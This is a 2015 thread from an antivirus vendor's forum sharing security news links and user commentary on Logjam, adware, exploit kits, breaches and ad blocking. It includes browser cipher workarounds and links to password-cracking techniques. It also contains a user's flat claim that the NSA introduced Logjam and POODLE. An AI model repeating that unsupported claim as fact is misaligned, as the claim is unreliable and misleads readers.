http://www.theregister.co.uk/2015/05/18/gta_malware_mods_warning/ (posted by avast on Google+)
-
Why downgrading SSL to better decrypt export encryption was a very bad idea after all...
The aftermath of the crypto-war threatens thousands and thousands of sites. Read: http://arstechnica.com/security/2015/05/https-crippling-attack-threatens-tens-of-thousands-of-web-and-mail-servers/
What more to expect after these NSA/FBI downgrading export operations, what comes after we experienced BEAST, POODLE, FREAK, Loglam?
polonus
P.S. Now ask yourselves why oh why servers like apache are including export (weaker) ciphersuits by default. :o
D
-
Login system supplies fake passwords to hackers
http://www.computerworld.com/article/2924114/security/login-system-supplies-fake-passwords-to-hackers.html
-
Exploit Kit authors give up on Malwarebytes users
https://blog.malwarebytes.org/exploits-2/2015/05/exploit-kit-authors-give-up-on-malwarebytes-users/?utm_source=Gplus&utm_medium=social
Another reason for layered protection.
-
Login system supplies fake passwords to hackers
http://www.computerworld.com/article/2924114/security/login-system-supplies-fake-passwords-to-hackers.html
Nice.
-
Good news:
Secret Google unit fights ad-fraud every day: http://adage.com/article/digital/inside-google-s-secret-war-ad-fraud/298652/ link article author = Alex Kantrowitz.
polonus
-
Bad news: fix for logjam makes many websites unreachable: http://www.engadget.com/2015/05/20/logjam-browser-vulnerability-fix/
So be aware when implementing the firefox work-around from MozillaZine's jscher2000:
Disable the insecure ciphers here:
(1) In a new tab, type or paste about:config in the address bar and press Enter. Click the button promising to be careful.
(2) In the search box above the list, type or paste ssl3 and pause while the list is filtered
(3) Double-click the security.ssl3.dhe_rsa_aes_128_sha preference to switch it from true to false (this usually would be the first item on the list)
(4) Double-click the security.ssl3.dhe_rsa_aes_256_sha preference to switch it from true to false (this usually would be the second item on the list)
That's it, you can test using: https://www.ssllabs.com/ssltest/viewMyClient.html
Alas blocking javascript does not help as SSL RSA handshake does not require javascript.
Only IE11 seems patched. test here: https://www.ssllabs.com/ssltest/viewMyClient.html
So for the moment do not use firefox, google chrome, sleipnir etc.
Also read here: https://groups.google.com/a/chromium.org/forum/#!topic/security-dev/Vnhy9aKM_l4
- some buggy servers may stop working and they really should be phased out!
polonus
-
Firefox gonna start showing ads based on one's browsing history: https://blog.mozilla.org/advancingcontent/2015/05/21/providing-a-valuable-platform-for-advertisers-content-publishers-and-users/
I like to keep blocking ads because I want to protect myself against malvertisers
and I am aware every 4 minutes new malware comes into this world.
polonus
-
Google Chrome logjam quick fix:
https://community.qualys.com/thread/15099
Info credits go to Jul Jones: he added a small compiled standalone batch file to load Chrome without the logjam vulnerability as well as other MiTM vulnerable ciphers
https://ssllocker.com/ChromeLocker.html (you have to fill in the captcha)
* Be aware there could be problems with some buggy https servers and services with weak ciphers you depend upon (banking etc. example Paypal needs to fix their SSL/TLS implimentation BUT Google should also discontinue RC4 ciphers in Chrome. ), so do not say that you weren't warned extensively before implementing this quick fix. Better to wait for the official patch from Google Chrome, but I wanted to give the work-arounds anyway to the g33ks.... (* my remarks: pol)
polonus
-
Adult Dating Site Members probably shared more than they bargained for. (http://www.channel4.com/news/adult-friendfinder-dating-hack-internet-dark-web)
AdultFinderFriends have just gained some unwanted friends.....
-
uBlock the easiest adblocker to set to block malvertisements only:
http://thenextweb.com/opinion/2015/05/21/ad-blockers-arent-immoral-but-maybe-youre-using-them-wrong/
link article author = Dwen Williams
polonus
-
uBlock the easiest adblocker to set to block malvertisements only:
http://thenextweb.com/opinion/2015/05/21/ad-blockers-arent-immoral-but-maybe-youre-using-them-wrong/ (http://thenextweb.com/opinion/2015/05/21/ad-blockers-arent-immoral-but-maybe-youre-using-them-wrong/)
link article author = Dwen Williams
polonus
Thanks. :)
-
NSA planned Google Play hack to target Android smartphones (http://www.zdnet.com/article/nsa-planned-google-play-hack-to-target-android-smartphones/)
So who needs Cyber Crooks ???
-
@bob3160,
The newly detected logjam weakness was introduced by NSA to compromise VPN traffic.
Also poodle allegedly came out of their labs.
polonus
-
Flawed Android Factory Reset Allows Recovery of Sensitive Data: Researchers
http://www.securityweek.com/flawed-android-factory-reset-allows-recovery-sensitive-data-researchers
This is scary. Too many people who don't know how to do proper reset.
-
Russia threatens to block Google, Twitter and facebook when these services do not follow up to Russian regulations:
http://www.theguardian.com/world/2015/may/22/russia-will-block-google-twitter-and-facebook-if-they-withhold-blogger-data
polonus
-
Browsers and servers should be patched against logjam, the kissing-cousin of Poodle!
Criminals on coffee-shop Wi-Fi networks are also abusing Logjam,
so it is not only state actors.
Firefox and Google Chrome we cannot wait weeks for this!
polonus
-
Fraud Can Happen Anytime, Anywhere, and to Anyone
https://blog.malwarebytes.org/online-security/2015/05/fraud-can-happen-anytime-anywhere-and-to-anyone/?utm_source=Gplus&utm_medium=social
Follow the directions to take the survey.
I got 15 out of 18.
At the end of the survey the Australian Federal Police (AFP) has a link about personal security.
The article by the AFP covers areas we talk about a lot here on the forums. It's worth going over again.
-
Interesting resume on logjam's impact on IP and DNS: https://nohats.ca/wordpress/blog/2015/05/20/weakdh-and-ike-ipsec/
(article author = Paul Wouters).
And read this: http://cryptologie.net/article/270/the-logjam-attack/ (we need end to end security).
Somehow Google Chrome developers went for speed over security: TLS also provides an option for EDH: ephemeral Diffie-Hellman in a multiplicative group. We chose ECDHE because of the speed advantages: EDH in a 2048-bit group is plenty secure, but much slower.
polonus
-
UAC Phishing Attack: http://blog.cylance.com/trick-me-once-shameonuac
Link article author = Derek Soeder
polonus
-
Adware PUPs are getting nastier and more and more irritating - LSP hijackers with rootkit-elements start to resemble real malware - the distinctions grey out: https://blog.malwarebytes.org/security-threat/2015/05/fake-adblocker-bylekh-is-an-lsp-hijacker/ (link article author PIETER ARNTZ).
polonus
-
New POS malware - new Alina variant and others: https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html link article authors: Nart Villeneuve, Daniel Regalado.
polonus
-
IRS Statement on the "Get Transcript" Application
http://www.irs.gov/uac/Newsroom/IRS-Statement-on-the-Get-Transcript-Application
-
Tech Support Scammers Go For Pornographic Shocker
https://blog.malwarebytes.org/fraud-scam/2015/05/tech-support-scammers-go-for-pornographic-shocker/?utm_source=Gplus&utm_medium=social
BSides London: The Writey Writer’s Workshop
https://blog.malwarebytes.org/conferences/2015/05/bsides-london-the-writey-writers-workshop/?utm_source=Gplus&utm_medium=social
-
Security researchers hindered by 0-day exploit strict export restrictions for dual use technology.
0-days can only to be acquired by government.
New rules to restrict export of surveillance-, hack en intrusion-software.
Robert Graham on this: http://blog.erratasec.com/2015/05/this-is-how-we-get-ants.html
"When you outlaw tools, outlaws are gonna use them" ;D
polonus
-
iPhone Crash: What You Need To Know
https://blog.malwarebytes.org/mobile-2/2015/05/iphone-crash-what-you-need-to-know/?utm_source=Gplus&utm_medium=social
Be careful with what you do with any smartphone any time.
I use one free weather website and lo and behold there is a banner at the top "telling" me my phone is infected.
It even includes a "scan now" button. I figured it was a phishing ad and didn't tap scan. It isn't just malicious text(s)/email
one need to worry about. Before you click/tap ask yourself "if it's worth the risk?" Do your research before you wish you had.
I do online scans on various websites and a lot of people would be shocked at the risks they are taking. A website may seem innocent,
but then again "is it?" Always scan before you click. "Look before you leap" attitude is a must anymore.
-
iPhone Crash: What You Need To Know
https://blog.malwarebytes.org/mobile-2/2015/05/iphone-crash-what-you-need-to-know/?utm_source=Gplus&utm_medium=social (https://blog.malwarebytes.org/mobile-2/2015/05/iphone-crash-what-you-need-to-know/?utm_source=Gplus&utm_medium=social)
Be careful with what you do with any smartphone any time.
I use one free weather website and lo and behold there is a banner at the top "telling" me my phone is infected.
It even includes a "scan now" button. I figured it was a phishing ad and didn't tap scan. It isn't just malicious text(s)/email
one need to worry about. Before you click/tap ask yourself "if it's worth the risk?" Do your research before you wish you had.
I do online scans on various websites and a lot of people would be shocked at the risks they are taking. A website may seem innocent,
but then again "is it?" Always scan before you click. "Look before you leap" attitude is a must anymore.
In your case, I'd question why a weather app wants to scan for malware and what's a weather app contain that allowed it to scan
my device to find a virus in the first place.
If an app requires more permission than it needs to perform it's function. Don't install it.
As an example, If your Flashlight app requires permission to access anything other than your camera, I wouldn't install it.
The flashlight function needs access to the flash function of your camera and therefore shouldn't need access to anything beyond that.
-
Hi bob3160,
I agree with what Para-Noid says as we have seen mal-apps posing as genuine benevolent ones.
If you take certain things at face-value you take a gigantic risk.
That is why I think it was bad that Google banned ad-blockers on androids in their function of mal-ad blockers.
The "secret" Google team hunts for fraudulent adclicks, malvertisers et all, etc, but they cannot catch up with all.
Moreover the grey lines between adware/crapware and real persistent malware is becoming thinner and thinner,
We should be protected and at least. Well, do as Para_Noid says: "Look hard before you leap".
Scan: http://mypermissions.org/
polonus
-
Command injection vulnerability in Synology Photo Station
https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html
-
iPhone Crash: What You Need To Know
https://blog.malwarebytes.org/mobile-2/2015/05/iphone-crash-what-you-need-to-know/?utm_source=Gplus&utm_medium=social
Apple comments on iOS 8 unicode crash bug, fix in the works
http://www.imore.com/unicode-rendering-bug-crashing-messages-lockscreen
-
Beware: Hola VPN turns your PC into an exit node and sells your traffic
http://www.ghacks.net/2015/05/28/beware-hola-vpn-turns-your-pc-into-an-exit-node-and-sells-your-traffic/
-
Scams Within Facebook Press On, Use “Facebook for Business” Hook
https://blog.malwarebytes.org/fraud-scam/2015/05/scams-within-facebook-press-on-use-facebook-for-business-hook/?utm_source=Gplus&utm_medium=social
-
Unusual Exploit Kit Targets Chinese Users (Part 1)
https://blog.malwarebytes.org/exploits-2/2015/05/unusual-exploit-kit-targets-chinese-users-part-1/?utm_source=Gplus&utm_medium=social
edit: Fixed missing URL :-[
-
TISA - overruling European local law, provided by lobbyists: https://www.eff.org/deeplinks/2015/05/tisa-yet-another-leaked-treaty-youve-never-heard-makes-secret-rules-internet
polonus
-
A "Zoo"on TLS Attacks, logjam and FREAK yet not included:
http://www.mitls.org/wsgi/tls-attacks
SSL certificate and configuration should be upgraded!
polonus
-
Keygen Capers and Suurgle Surveys
https://blog.malwarebytes.org/fraud-scam/2015/05/keygen-capers-and-suurgle-surveys/?utm_source=Gplus&utm_medium=social
-
Seized megaupload domains now in the hands of malcreants with links to scam ads and malware!
http://torrentfreak.com/seized-megaupload-domains-link-to-scam-ads-and-malware-150528/
link article author = Ernesto.
polonus
-
Buying a PC this year? Here’s what you need to know about bloatware
http://www.digitaltrends.com/computing/the-state-of-pc-bloatware-in-2015/
-
Buying a PC this year? Here’s what you need to know about bloatware
http://www.digitaltrends.com/computing/the-state-of-pc-bloatware-in-2015/ (http://www.digitaltrends.com/computing/the-state-of-pc-bloatware-in-2015/)
Posted a while back, a chart showing the biggest offenders:
https://forum.avast.com/index.php?topic=19387.msg1188015#msg1188015 (https://forum.avast.com/index.php?topic=19387.msg1188015#msg1188015)
-
Firefox going to check downloads via Google Safebrowsing from version 39.
But other security should also be implemenred: https://bugzilla.mozilla.org/show_bug.cgi?id=672600
polonus
-
Google Launches “My Account” Privacy and Security Aid
https://blog.malwarebytes.org/online-security/2015/06/google-launches-my-account-privacy-and-security-aid/?utm_source=Gplus&utm_medium=social
Techies rejoice, we’re partnering up with LabTech
https://blog.malwarebytes.org/news/2015/06/techies-rejoice-were-partnering-up-with-labtech/?utm_source=Gplus&utm_medium=social
-
“Download Virus” Email Comes with a Twist
https://blog.malwarebytes.org/online-security/2015/06/download-virus-email-comes-with-a-twist/?utm_source=Gplus&utm_medium=social
-
Locker ransomware dev decrypted everyones files for free: (http://www.bleepingcomputer.com/forums/t/578182/today-locker-ransomware-dev-decrypted-everyones-files-for-free/?p=3723675)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1433358942857-53898.png)
-
Florida School Teacher Gets Jammin’
https://blog.malwarebytes.org/privacy-2/2015/06/florida-school-teacher-gets-jammin/?utm_source=Gplus&utm_medium=social
Fake UPS Email Leads to…Nikola Tesla and Bifilar Coils?!
https://blog.malwarebytes.org/online-security/2015/06/fake-ups-email-leads-to-nikola-tesla-and-bifilar-coils/?utm_source=Gplus&utm_medium=social
When Trolls Come in a Three-Piece Suit
https://blog.malwarebytes.org/social-engineering/2015/06/when-trolls-come-in-a-three-piece-suit/?utm_source=Gplus&utm_medium=social
Something we have all been guilty of at on time or another.
-
OPM to Notify Employees of Cybersecurity Incident
http://www.opm.gov/news/releases/2015/06/opm-to-notify-employees-of-cybersecurity-incident/
-
OPM to Notify Employees of Cybersecurity Incident
http://www.opm.gov/news/releases/2015/06/opm-to-notify-employees-of-cybersecurity-incident/ (http://www.opm.gov/news/releases/2015/06/opm-to-notify-employees-of-cybersecurity-incident/)
They are also supposed to offer them free credit monitoring :)
-
Evil Wi-Fi captive portal could spoof Apple Pay to get users’ credit card data
http://arstechnica.com/security/2015/06/evil-wifi-captive-portal-could-fool-users-into-giving-up-apple-pay-data/
-
Up, Down, Left, Right, Hack
https://blog.malwarebytes.org/privacy-2/2015/06/up-down-left-right-hack/?utm_source=Gplus&utm_medium=social
-
Scammers Exploit Alton Towers Crash with Fake YouTube Video
https://blog.malwarebytes.org/fraud-scam/2015/06/scammers-exploit-alton-towers-crash-with-fake-youtube-video/?utm_source=Gplus&utm_medium=social
edit: It's bad enough when there's a tragedy like the Alton Towers crash without some insensitive nitwit doing cr*p like this.
Families, friends and a whole nation grieve then some lame brain twit does this. If my anger shows, it shows because I want it to show.
-
Scammers Exploit Alton Towers Crash with Fake YouTube Video
https://blog.malwarebytes.org/fraud-scam/2015/06/scammers-exploit-alton-towers-crash-with-fake-youtube-video/?utm_source=Gplus&utm_medium=social (https://blog.malwarebytes.org/fraud-scam/2015/06/scammers-exploit-alton-towers-crash-with-fake-youtube-video/?utm_source=Gplus&utm_medium=social)
edit: It's bad enough when there's a tragedy like the Alton Towers crash without some insensitive nitwit doing cr*p like this.
Families, friends and a whole nation grieve then some lame brain twit does this. If my anger shows, it shows because I want it to show.
It unfortunately happens for just about every tragic event you can think of. :'(
-
Kaspersky's own system again infected with very sophisticated spyware:
http://www.nu.nl/internet/4065988/israel-tapte-gesprekken-rond-nucleair-akkoord-iran-af-met-spionagevirus.html
http://www.wsj.com/articles/spy-virus-linked-to-israel-targeted-hotels-used-for-iran-nuclear-talks-1433937601
http://www.wired.com/2015/06/kaspersky-finds-new-nation-state-attack-network/
-
Kaspersky's own system again infected with very sophisticated spyware:
http://www.nu.nl/internet/4065988/israel-tapte-gesprekken-rond-nucleair-akkoord-iran-af-met-spionagevirus.html
http://www.wsj.com/articles/spy-virus-linked-to-israel-targeted-hotels-used-for-iran-nuclear-talks-1433937601
http://www.wired.com/2015/06/kaspersky-finds-new-nation-state-attack-network/
Kaspersky Lab investigates hacker attack on its own network
https://blog.kaspersky.com/kaspersky-statement-duqu-attack/
-
Microsoft Security Bulletin Summary for June 2015
https://technet.microsoft.com/en-us/library/security/ms15-jun.aspx
-
Of Counterfeit Sites and Denali Jackets
https://blog.malwarebytes.org/fraud-scam/2015/06/of-counterfeit-sites-and-denali-jackets/?utm_source=Gplus&utm_medium=social
Another reason to "look before you leap".
Always pre-scan a site before clicking.
In Firefox I use "Scan URL with" add-on. "Scan URL with" has multiple ways to pre-scan a site.
-
Be Careful on your (Digital) Travels
https://blog.malwarebytes.org/hacking-2/2015/06/be-careful-on-your-digital-travels/?utm_source=Gplus&utm_medium=social
Draftback: Sensible Sharing Pays Off
https://blog.malwarebytes.org/privacy-2/2015/06/draftback-sensible-sharing-pays-off/?utm_source=Gplus&utm_medium=social
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
-
Unusual Exploit Kit Targets Chinese Users (Part 2)
https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-chinese-users-part-2/?utm_source=Gplus&utm_medium=social
Part 1 can be seen in reply #3735.
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
Most users have considered almost all toolbars as malware.
Users havve three choices...
1) Read each screen during any install and untick what you don't want.
2) Use "Unckecky".
3) Worse case scenario...put up with a massive, and mostly unneeded, number of toolbars.
I know one guy who had ten (10), yes ten different toolbars on his computer. When I asked him, why?
He said he needed each one of them. After a little education I helped him knock it down to exactly one...his url address bar.
Any more the address bar also serves as a search bar. What more do you need?
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
Most users have considered almost all toolbars as malware.
Users havve three choices...
1) Read each screen during any install and untick what you don't want.
2) Use "Unckecky".
3) Worse case scenario...put up with a massive, and mostly unneeded, number of toolbars.
I know one guy who had ten (10), yes ten different toolbars on his computer. When I asked him, why?
He said he needed each one of them. After a little education I helped him knock it down to exactly one...his url address bar.
Any more the address bar also serves as a search bar. What more do you need?
Toolbar collection ;D
http://www.brucebnews.com/wp-content/uploads/2012/03/toolbar-ieoverwhelmed.jpg
-
Security and Privacy greatly ignored by development of IoT (Internet of Things).
Read: http://iotevent.eu/internet-of-things-event/john-matherly-shodan-aspects-of-the-iot-that-others-are-not-talking-about/
Just an example - mal-ads that cannot be easily blocked anymore, device-broad accounts that may violate through Admob for instance, just think of GMail and Google as a corporation that won't comply to privacy regulations and the right to delete only when they are being forced to comply (EU) and then they also try to fight it or place their heels in the sand reluctantly. Re: http://www.huffingtonpost.com/2013/08/13/gmail-privacy_n_3751971.html
If users do not block what they cannot trust anymore or ignore by sheer disinterest, they only have themselves to blame.
The mal-ad pusher doesn't mind and will go on with their cheap money gathering no matter what to violate security and privacy.
polonus
-
Another security issue or a blessing?: http://www.nist.gov/itl/iad/201506_tattoo_workshop.cfm
polonus
-
They would have fun with my daughter-in-law. She has tattoos almost every where.
Most are really cool. Some not so cool.
Here in the USA prisons use tattoo recognition to determine gang affiliations to, hopefully, ward off any problems.
-
OpenSSL Security Advisory [11 Jun 2015]
https://www.openssl.org/news/secadv_20150611.txt
-
Complex Method of Obfuscation Found in Dropper RealShell
https://blog.malwarebytes.org/mobile-2/2015/06/complex-method-of-obfuscation-found-in-dropper-realshell/?utm_source=Gplus&utm_medium=social
-
Ask Toolbar latest version no longer detected by MS as malware: http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=BrowserModifier%3AWin32%2FAskToolbarNotifier&wa=wsignin1.0#tab=1
See: http://news.yahoo.com/microsoft-confirms-ask-toolbar-not-215800633.html
The toolbar comes bundled with all sorts of software and
as not malicious per se some may consider it adware or a PUP.
pol
-
Ask Toolbar Now Considered Malware By Microsoft ;)
http://search.slashdot.org/story/15/06/11/1223236/ask-toolbar-now-considered-malware-by-microsoft
Ask Toolbar latest version no longer detected by MS as malware: http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=BrowserModifier%3AWin32%2FAskToolbarNotifier&wa=wsignin1.0#tab=1
One step forward, two steps back... ::)
-
I still remove it, as the vast majority of people do not even know they have it
-
Yes, the way the flaggelants moved.
See attached - MS self-punishment.
pol
-
I still remove it, as the vast majority of people do not even know they have it
Way to go pal, you're top-notch. :)
-
Warning: Don’t Download Software From SourceForge If You Can Help It
http://www.howtogeek.com/218764/warning-don%E2%80%99t-download-software-from-sourceforge-if-you-can-help-it/
This is news to me.
-
Warning: Don’t Download Software From SourceForge If You Can Help It
http://www.howtogeek.com/218764/warning-don%E2%80%99t-download-software-from-sourceforge-if-you-can-help-it/
This is news to me.
This is actually quite old, I would still trust sourceforge as since that happened there have been changes (more likely forced). Authors of existing software still being maintained/updated have to give permission to have any add-ons I believe.
That said all users should apply the normal degree of caution when installing applications (custom install only) and you also have UnChecky to help prevent unwanted add-ons.
-
Hi DavidR,
We here are fully aware of the general threat of bundled goodies, PUPs, additional risk-, crap-, junk- and adware.
However the average unaware or disinterested user is eventually trapped as the avoidability of these marketed goodies to gain "cheap money" becomes harder and harder. The truth that freeware is being paid by giving up part of your privacy and by trading your personal data in some form of user contempt is not fully known, we here that deal with such abuse everyday know better, while we see that the balance is more and more slipping out of the users' hands. Worse is that hordes of users do not seem to mind at all and even seem to welcome this state of affairs while merrily clicking on in some form of apathy. ;D
polonus
-
Hi DavidR,
We here are fully aware of the general threat of bundled goodies, PUPs, additional risk-, crap-, junk- and adware.
However the average unaware or disinterested user is eventually trapped as the avoidability of these marketed goodies to gain "cheap money" becomes harder and harder. The truth that freeware is being paid by giving up part of your privacy and by trading your personal data in some form of user contempt is not fully known, we here that deal with such abuse everyday know better, while we see that the balance is more and more slipping out of the users' hands. Worse is that hordes of users do not seem to mind at all and even seem to welcome this state of affairs while merrily clicking on in some form of apathy. ;D
polonus
The problem is that those who could really benefit from this topic aren't reading it as they A) probably don't know of its existence or B) are happy living in bliss (Ignorance is Bliss). Or what you don't know about or understand doesn't do you any harm.
-
The problem is that those who could really benefit from this topic aren't reading it as they A) probably don't know of its existence or B) are happy living in bliss (Ignorance is Bliss). Or what you don't know about or understand doesn't do you any harm.
David and/or Polonus, could you help taking them from ignorance (at least some of them) and write a blog article about this issue?
-
Hi DavidR,
We here are fully aware of the general threat of bundled goodies, PUPs, additional risk-, crap-, junk- and adware.
However the average unaware or disinterested user is eventually trapped as the avoidability of these marketed goodies to gain "cheap money" becomes harder and harder. The truth that freeware is being paid by giving up part of your privacy and by trading your personal data in some form of user contempt is not fully known, we here that deal with such abuse everyday know better, while we see that the balance is more and more slipping out of the users' hands. Worse is that hordes of users do not seem to mind at all and even seem to welcome this state of affairs while merrily clicking on in some form of apathy. ;D
polonus
The problem is that those who could really benefit from this topic aren't reading it as they A) probably don't know of its existence or B) are happy living in bliss (Ignorance is Bliss). Or what you don't know about or understand doesn't do you any harm.
Those that attend my Avast sponsored presentations certainly get ot know about this and many other dangers:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1434381543861-96525.png)
Attendees not only learn what to avoid but tools available to make avoidance easier. :)
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1434400555753-37615.png)
One down - 1000 to go ??? (http://www.pcworld.com/article/2935772/with-payroll-in-arrears-online-antivirus-seller-shuts-doors.html)
-
My dear Avast friends,
Do not forget about ever ongoing click-fraud mal-ad campaigns on the world wide web.
Present mal-ad campaign hits my country, the Netherlands: http://blog.fox-it.com/2015/06/15/large-malvertising-campaign-targeting-the-netherlands/
polonus
P.S. Bob, we know you are wakening up your US user-base,
I hope that the wrinkles in this pond of awareness may grow and grow to wake up others...
D
-
Chinese websites vulnerable: https://en.wikipedia.org/wiki/JSONP#Security_concerns
Watering hole attack to detect the real identity of particular Chinese tor and VPN users:
https://www.alienvault.com/open-threat-exchange/blog/watering-holes-exploiting-jsonp-hijacking-to-track-users-in-china link article author = Jaime Blasco
polonus
-
LastPass was hacked, passwords should be changed: https://blog.lastpass.com/nl/2015/06/lastpass-security-notice.html/
polonus
-
is this your next password?
UK firm launches emoji alternative to Pin codes
http://www.bbc.com/news/technology-33063344
https://vimeo.com/130728753
https://vimeo.com/user25085293
-
LastPass was hacked, passwords should be changed: https://blog.lastpass.com/nl/2015/06/lastpass-security-notice.html/ (https://blog.lastpass.com/nl/2015/06/lastpass-security-notice.html/)
polonus
They do follow up tp make sure it was you who made the change:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1434466425164-73822.png)
-
L.S.
Security often stays a last resort issue. We sometimes see bug-sprints, we never ever see or experience security-sprints. In development it is always feature first (where the money can be made), security last, especially when a developer has not got the time to implement it properly, security goes out of the door!. Privacy friendly tools are being built by huminitarian friendly developers via Random Hacks of Kindness, securing the code while passing it back to developers'hands. Geeks Without Bounds has such a project The code is written by volunteers to protect user security. A noble initiative. Like to support this. You cannot say you are unaware of such an initiative...info credits go to Henk-Jan Buist
polonus (volunteer website security analyst and website error-hunter()
Only trust that code that you have tested yourself to be secure!
-
Life in the Days of Big Brother!
Are we going to need anti-recognition specs to be secure from facial recognition by government and corporations alike?
T-Mobile for instance to know when you are in the vicinity of their shop, so they will send you a message?
Read: http://www.washingtonpost.com/blogs/the-switch/wp/2015/06/16/the-governments-plan-to-regulate-facial-recognition-tech-is-falling-apart/
Push for Privacy Standards for Facial Recognition Falters
Read : http://abcnews.go.com/Technology/wireStory/push-privacy-standards-facial-recognition-falters-31791155
polonus
-
Hi bob3160,
Here you can read from a specialist how password hackers have an easy job wihen a certain phased strategy is applied:
https://www.praetorian.com/blog/statistics-will-crack-your-password-mask-structure
Markov chain attack: https://www.cs.utexas.edu/~tansey/passwords.pdf
4 years calculation time can be reduced to 40 minutes: https://hashcat.net/wiki/doku.php?id=mask_attack
Attacks on LastPass with scrapers and adders: https://digi.ninja/projects/cewl.php
Use of the Prince-algorithm: https://hashcat.net/events/p14-trondheim/prince-attack.pdf
Best line of defense for admins: https://en.wikipedia.org/wiki/Bcrypt
links from an article by Andreas Udo de Haes (info credits).
That is why the White House strives for other metods than passwords to go onto the Internet:
smart ID cards: https://www.whitehouse.gov/blog/2010/06/25/national-strategy-trusted-identities-cyberspace
link author Howard A. Smith.
polonus
-
Hi bob3160,
Here you can read from a specialist how password hackers have an easy job wihen a certain phased strategy is applied:
https://www.praetorian.com/blog/statistics-will-crack-your-password-mask-structure (https://www.praetorian.com/blog/statistics-will-crack-your-password-mask-structure)
Markov chain attack: https://www.cs.utexas.edu/~tansey/passwords.pdf (https://www.cs.utexas.edu/~tansey/passwords.pdf)
4 years calculation time can be reduced to 40 minutes: https://hashcat.net/wiki/doku.php?id=mask_attack (https://hashcat.net/wiki/doku.php?id=mask_attack)
Attacks on LastPass with scrapers and adders: https://digi.ninja/projects/cewl.php (https://digi.ninja/projects/cewl.php)
Use of the Prince-algorithm: https://hashcat.net/events/p14-trondheim/prince-attack.pdf (https://hashcat.net/events/p14-trondheim/prince-attack.pdf)
Best line of defense for admins: https://en.wikipedia.org/wiki/Bcrypt (https://en.wikipedia.org/wiki/Bcrypt)
links from an article by Andreas Udo de Haes (info credits).
[size=78%] [/size]
That is why the White House strives for other metods than passwords to go onto the Internet:
smart ID cards: https://www.whitehouse.gov/blog/2010/06/25/national-strategy-trusted-identities-cyberspace (https://www.whitehouse.gov/blog/2010/06/25/national-strategy-trusted-identities-cyberspace)
link author Howard A. Smith.
polonus
@ Damien,
[/size]I suggest you read the following: http://blog.lumension.com/10249/lastpass-hack/?utm_source=Cluley&utm_campaign=10a4de2295-Graham_Cluley&utm_medium=email&utm_term=0_8106850f4a-10a4de2295-62385553 (http://blog.lumension.com/10249/lastpass-hack/?utm_source=Cluley&utm_campaign=10a4de2295-Graham_Cluley&utm_medium=email&utm_term=0_8106850f4a-10a4de2295-62385553)[size=78%]
Not everything is always doom and gloom. And just because the White house strives for something, that doesn't mean much to me. :)
-
Hi bob3160,
We keep the security warnings well balanced then ;)
I keep the glass half empty and you for balance keep it half full. ;D
Couldn't it be better?
Damian
-
Report Phishing and get a reward ;) http://news.netcraft.com/phishing-report-competition/
-
Major zero-day security flaws in iOS & OS X allow theft of both Keychain and app passwords
http://9to5mac.com/2015/06/17/major-zero-day-security-flaws-in-ios-os-x-allow-theft-of-both-keychain-and-app-passwords/
-
10.000.000 dollar investment to render adblockers inoperable: http://www.prnewswire.com/news-releases/sourcepoint-introduces-the-first-content-compensation-platform-will-address-publisher-monetization-challenges-300101070.html
Adblockers help you to block malvertising ads, clickfraud etc.
Name of the game "either attention or dollars" - lost by the undermining workings of Adblockers.
But they never explored why users want to block certain unwanted -mainly third party - content, the user and security position is not even considered in this initiative, Features and ads bring money, security does also but is ignored by those that strive to circumvent/block/lame adblocking. I.m.h.o. script & request blocking developers will face a new need of defense as will DNS and IP blocking tools. Keep content mal-ad free!.
polonus
-
L.S.
Update on adblock nullifier initiatives - Report unblocked ad content here: http://forums.lanik.us/viewforum.php?f=62&sid=00bf6353e08623910d48974d11e1be67 EasyList forums.
I personally run this script from my Tampermonkey extension in Google Chrome: https://greasyfork.org/en/scripts/735-anti-adblock-killer-reek Anti-Adblock Killer is a userscript aiming to circumvent many protections used on some websites that force the user to disable AdBlockers. This way, you can continue to visit such websites without having to disable your Adblocker.
Damian
-
If they want me to see their ads then they can pay me.
It's my computer and I get to decide what I see or don't see.
If only it was that easy.
If a website "tells" me to disable my ad blocker to view their site, I go to a different site offering the same content/information/product.
I don't "have to" go to their website. I have other choices/options.
-
The Infosec Europe and BSides London Round-up
https://blog.malwarebytes.org/conferences/2015/06/the-infosec-europe-and-bsides-london-round-up/?utm_source=Gplus&utm_medium=social
AdChoices, interest based advertising
https://blog.malwarebytes.org/privacy-2/2015/06/adchoices-interest-based-advertising/?utm_source=Gplus&utm_medium=social
-
Heinz ketchup bottle QR code leads to hardcore porn site
www.theverge.com/2015/6/19/8811425/heinz-ketchup-qr-code-porn-site-fundorado
-
MalwareBytes acquires Junkware Removal Tool
http://www.majorgeeks.com/news/story/malwarebytes_acquires_junkware_removal_tool.html
-
New Exploitkit "Sundown" aims at user that has not updated Adobe Flash Player!
Adobe "the new Java" of our time!
Read: http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html
Analysis: https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-Beta-BEP
Info credits go to: Aditya Sood en Rohit Bansal
polonus
-
MalwareBytes acquires Junkware Removal Tool
http://www.majorgeeks.com/news/story/malwarebytes_acquires_junkware_removal_tool.html
Very interesting and looking forward how MBAM will incorporate this tool into their program. MBAM always keeps on getting better and better :)
-
Comics, a way to make users more security aware: http://www.littlebobbycomic.com/projects/week-17-encryption-and-me-1/
polonus
-
Dutch botnets aggressively attacking Norway & Sweden, read report:
http://www.level3.com/~/media/files/white-paper/en_secur_wp_botnetresearchreport.ashx
Behind USA, Ukraine and Russia the Netherlands is falicitating the fourth largest malbot infra-structure in the World.
polonus
-
